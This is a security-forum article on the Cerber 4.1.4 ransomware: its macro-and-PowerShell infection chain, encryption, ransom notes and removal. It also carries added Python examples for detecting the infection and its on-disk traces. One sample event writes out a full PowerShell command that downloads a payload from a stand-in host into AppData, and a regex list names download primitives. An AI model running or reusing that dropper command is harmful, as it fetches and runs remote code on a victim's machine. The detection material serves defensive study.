Cerber 4.1.4 Virus Remove It and Try Decrypting Encrypted Files - How to, Technology and PC Security Forum | SensorsTechForum.com

Cerber 4.1.4 Virus Remove It and Try Decrypting Encrypted Files


One of the most impactful ransomware families, Cerber, has released yet another iteration of its fourth variant. The virus has changed how it communicates with its C&C servers and has slightly changed its infection method, switching to malicious macros to carry out the infection. Regarding encryption, not much has changed: Cerber still alters the names of the encrypted files and appends a random four-character (A-Z, 0-9) file extension. Anyone who has been infected by this iteration of Cerber ransomware should immediately focus on removing it from their computer instead of paying the ransom. If you are looking for alternative methods to remove Cerber by yourself and try to restore the encrypted files, we suggest you read the following article thoroughly.

Threat Summary

Name: Cerber 4.1.4
Type: Ransomware Virus
Short Description: This Cerber ransomware variant 4.1.4 encrypts files with the RSA or AES ciphers, adding four randomly generated A-Z, 0-9 characters (e.g. .z33f) as a file extension to the encrypted files, and asks for a ransom payment for decryption.
Symptoms: Files are encrypted and become inaccessible to any type of software. Several ransom notes with instructions for paying the ransom appear as "Readme.hta" files.
Distribution Method: Via malicious macros in Microsoft Office or Adobe Reader documents.
Detection Tool: See if your system has been affected by Cerber 4.1.4 (Malware Removal Tool).
Data Recovery Tool: Stellar Phoenix Data Recovery Technicians License (Pro version with more features). Notice! This product scans your drive sectors to recover lost files; it may not recover 100% of the encrypted files, but only a few of them, depending on the situation and whether or not you have reformatted your drive.
User Experience: Join our forum to discuss Cerber Ransomware.

Cerber 4.1.4 – In-Depth Information

To help you better understand how Cerber ransomware version 4.1.4 operates, we will take you through the threat methodically, from distribution to the final ransom payment URL.

Cerber 4.1.4’s Distribution and Infection

To cause a successful infection, the creators of Cerber 4.1.4 ransomware have most likely used a piece of software known in the research field as a file joiner, which combines malicious files with legitimate documents. This tool may have allowed the coders to create an obfuscated macro infection that is activated only when you enable macros on a Microsoft Office document to edit it shortly after opening it.


The procedure for spreading this malware is much the same as most such procedures. Phishing e-mails may be used to spam the user, tricking them into opening malicious documents. The documents distributing Cerber 4.1.4 are primarily in the .doc file format and have random numeric file names.


Such a document is attached to a fraudulent spam message that aims to convince the user, with false claims, that the document is important.


Once the malicious macro runs, it may execute the infection in an obfuscated manner, which brings us to another tool used by the coders of Cerber 4.1.4: malware obfuscators, which evade detection by most conventional and widely used anti-virus programs.

Related Article: Obfuscation in Malware – The Key to A Successful infection

The malicious macros launch Windows PowerShell as an administrator only to quietly execute a command that sets up the download.


The malware then downloads the actual payload of Cerber 4.1.4 ransomware by connecting to a remote server via another PowerShell command, as reported by Bleeping Computer researchers.


According to that report, Cerber ransomware's payload is downloaded as a file named winx64.exe, located in the %AppData% folder.

As soon as the malicious file is downloaded, the malware automatically starts it, so that it begins encrypting the victim's files.
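To illustrate the infection chain described above from the detection side, here is an added Python example (not code from the original article) that classifies constructed process-creation events for the three indicators the article describes: an Office application spawning PowerShell, a PowerShell download primitive, and an executable started from %AppData%. The process names, event field names and sample events are assumptions made for this example.

```python
import ntpath
import re

# Parent processes the article names as macro carriers: Office apps and
# Adobe Reader (acrord32.exe is the assumed Reader process name).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "acrord32.exe"}
PS_IMAGES = {"powershell.exe", "pwsh.exe"}
# Typical PowerShell download primitives seen in macro droppers.
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|net\.webclient|invoke-webrequest|\biwr\b",
    re.IGNORECASE)
# An executable under %AppData% (Roaming profile), as the article describes.
APPDATA_EXE_RE = re.compile(
    r"(%appdata%|\$env:appdata|\\appdata\\roaming)[^\s\"']*\.exe", re.IGNORECASE)


def classify(event):
    """Return the list of indicators an event matches (empty = nothing)."""
    parent = ntpath.basename(event["parent_image"]).lower()
    image = ntpath.basename(event["image"]).lower()
    cmd = event["command_line"]
    reasons = []
    if parent in OFFICE_PARENTS and image in PS_IMAGES:
        reasons.append("office-spawned-powershell")
    if image in PS_IMAGES and DOWNLOAD_RE.search(cmd):
        reasons.append("powershell-download")
    if APPDATA_EXE_RE.search(event["image"]) or APPDATA_EXE_RE.search(cmd):
        reasons.append("appdata-executable")
    return reasons


def triage(events):
    """Keep flagged events only, as (pid, indicators) pairs."""
    return [(e["pid"], r) for e in events for r in [classify(e)] if r]


# Constructed sample process-creation events (not real telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 4120, "parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": PS, "command_line": "powershell.exe -NoP -W Hidden -c \"(New-Object "
     "Net.WebClient).DownloadFile('http://c2.example.invalid/p', "
     "'C:\\Users\\bob\\AppData\\Roaming\\winx64.exe')\""},
    {"pid": 4188, "parent_image": PS,
     "image": r"C:\Users\bob\AppData\Roaming\winx64.exe",
     "command_line": r"C:\Users\bob\AppData\Roaming\winx64.exe"},
    {"pid": 2210, "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": r"powershell.exe -File C:\Scripts\backup.ps1"},  # benign
    {"pid": 2300, "parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe", "command_line": "splwow64.exe 12288"},
]
```

Only the first two constructed events are flagged; the admin backup script and Word's print helper process produce no indicators.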

Cerber 4.1.4 – Post-Infection Analysis

By default, Cerber ransomware has not changed its already strong and so far unbeaten encryption. It still uses an immensely strong combination of the RSA and AES encryption algorithms to scramble files of the following types:

  • Microsoft Office documents.
  • Adobe Reader files.
  • Adobe Photoshop and other Adobe software files.
  • Pictures.
  • Videos.
  • Audio files.
  • Databases.
  • Virtual machines.

After the encryption, the enciphered files still take the very same form:

  • No longer openable.
  • Changed names.
  • Changed file extension.

Cerber also drops its distinctive "Readme.hta" ransom note file, which once more leads to the standard Cerber payment web page.


After this has been completed, the ransomware may also heavily modify registry entries so that the malicious executable located in the %AppData% folder runs every time Windows starts, encrypting newly added files and files on removable drives such as USB sticks.
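As an added example, not from the original article, the following Python script scans a directory tree for the on-disk artifacts just described: renamed files carrying an unknown four-character A-Z/0-9 extension, and "Readme.hta" ransom notes. The allow-list of legitimate four-character extensions and the constructed sample tree are assumptions made for this example.

```python
import os
import re
import tempfile

# Indicators described in the article: Cerber 4.x renames each encrypted
# file and appends a random four-character A-Z/0-9 extension, and it drops
# "Readme.hta" ransom notes next to the encrypted data.
CERBER_EXT = re.compile(r"^\.[a-z0-9]{4}$", re.IGNORECASE)
RANSOM_NOTE = "readme.hta"
# Legitimate four-character extensions the pattern would otherwise flag
# (assumption: extend this allow-list for your own environment).
KNOWN_EXTS = {".docx", ".xlsx", ".pptx", ".jpeg", ".html", ".json",
              ".webp", ".tiff", ".yaml", ".java", ".flac", ".mpeg"}


def scan_tree(root, min_suspects=3):
    """Walk `root`; at least one ransom note plus `min_suspects` renamed
    files with an unknown 4-char extension is treated as a Cerber hit."""
    suspects, notes = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower() == RANSOM_NOTE:
                notes.append(path)
                continue
            ext = os.path.splitext(name)[1]
            if CERBER_EXT.match(ext) and ext.lower() not in KNOWN_EXTS:
                suspects.append(path)
    return {"suspect_files": suspects, "ransom_notes": notes,
            "likely_infected": bool(notes) and len(suspects) >= min_suspects}


def build_sample_tree(infected=True):
    """Constructed sample data: a temp directory mimicking a user profile."""
    root = tempfile.mkdtemp(prefix="cerber_demo_")
    docs = os.path.join(root, "Documents")
    os.makedirs(docs)
    names = ["budget.xlsx", "notes.json", "photo.jpeg"]  # untouched files
    if infected:  # renamed files with random extensions, plus two notes
        names += ["kR7sQ2nA1b.z33f", "Mz0pL9xV4c.7a1k", "Qw3e.bn5m", "Readme.hta"]
    for name in names:
        with open(os.path.join(docs, name), "wb") as fh:
            fh.write(b"\x00" * 16)
    if infected:
        with open(os.path.join(root, "Readme.hta"), "w") as fh:
            fh.write("<html>ransom note placeholder</html>")
    return root
```

Running scan_tree(build_sample_tree()) reports three suspect files and two ransom notes and flags the tree; the clean variant is not flagged.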

How to Remove Cerber 4.1.4 Virus and Try To Get Back Encrypted Files

Basically, Cerber 4.1.4 is yet another of the many Cerber variants we have detected in the wild. The malware is very sophisticated in what it does, and researchers are yet to discover any bugs in its code that would allow them to crack the virus, as they did with the first variant of Cerber.

If you are looking for methods to restore your files after they have been encrypted by this nasty threat, our advice is to act immediately and remove it safely, using the instructions below. You can try to remove it manually, but we strongly recommend using a professional malware removal tool to do the job for you swiftly and safely.

After removing Cerber, we have offered several alternative suggestions that may help you try to recover your non-openable files. We are constantly researching newer data recovery methods that will help you recover your files. Since sophisticated malware like Cerber deletes the original files with several overwrite passes, it is very difficult to come up with a solution that is 100% effective. Still, we will keep researching and fighting this nasty threat, and we will update this article with more information if a decryptor is released, so we advise following our blog regularly.


Ventsislav Krastev

Ventsislav has been covering the latest malware, software and newest tech developments at SensorsTechForum for 3 years now. He started out as a network administrator. Having also graduated in Marketing, Ventsislav has a passion for discovering new shifts and innovations in cybersecurity that become game changers. After studying Value Chain Management and then Network Administration, he found his passion within cybersecurity and is a strong believer in basic education of every user towards online safety.
